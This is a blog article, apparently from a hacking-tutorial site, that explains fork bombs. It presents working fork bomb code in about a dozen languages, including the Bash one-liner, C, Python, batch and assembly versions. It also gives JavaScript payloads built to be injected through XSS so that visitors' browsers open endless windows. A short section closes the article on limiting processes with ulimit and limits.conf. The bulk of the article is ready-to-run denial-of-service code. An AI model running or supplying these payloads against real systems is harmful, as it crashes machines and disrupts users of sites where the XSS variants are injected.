img

Fork Bomb

/
/
/
1160 Views

Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it’s also annoying.

fork bomb

What Is Fork Bomb ??

Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.

How About Virus Doubling Itself !!

Virus doubling itself is a form of exponential growth.

  1. After a single iteration of the loop, two viruses are created.
  2. After another cycle, each of those two creates another two for a total of four same virus.
  3. After 10 iterations we’ll have 2^10 = 1024 virus.
  4. After 100 iterations we have 2^100 = 1.267 Nonillion, that’s a number so big you don’t even know what ‘Nonillion’ is (It’s 10^30).

Even with today’s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.

Concept Behind Fork Bomb

Creation of a function that calls itself twice every call and doesn’t have any way to terminate itself. It will keep doubling up until you run out of system resources.

Coding Fork Bomb In Different Programming Languages

1# Fork Bomb using the Bash shell:

:(){ :|:& };:

Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.

2# Encoding in a standalone shell script as opposed to a shell function:

#!/bin/bash

./$0|./$0& #”$0″ returns the name of the shell script itself

3# Fork Bomb using the Microsoft Windows batch language:

:s
start “” %0
goto s

The same as above, but shorter:
%0|%0

4# Fork Bomb using inline shell of Perl interpreter:

perl -e “fork while fork” &

5# Fork Bomb Using Python:

import os
while 1:
os.fork()

6# Fork Bomb Using Ruby:

loop { fork { load(__FILE__) } }

7# Fork Bomb using Haskell:

import Control.Monad (forever)
import System.Posix.Process (forkProcess)

forkBomb = forever $ forkProcess forkBomb

main = forkBomb

8# Fork Bomb using Common Lisp (Clozure CL):

(loop (#_fork))

9# Fork Bomb using C:

#include <unistd.h>

int main(void)
{
while(1) fork();
}

10# Fork Bomb using Assembly:

section .text
global_start

_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start

Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}

11# Fork Bomb using VB.net:

Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True

12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>

Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:

<a href=”#” onload=”function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }”>XSS fork bomb</a>

Or, a more aggressive version:

<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

Prevention

As a Fork Bomb’s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.

  • On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit –u 30 would limit the affected user to a maximum of thirty owned processes.
  • On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf
  • On FreeBSD, the system administrator can put limits in /etc/login.conf.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON provided knowledge about an amazing virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

  • Facebook
  • Twitter
  • Google+
  • Linkedin
  • Pinterest

Leave a Reply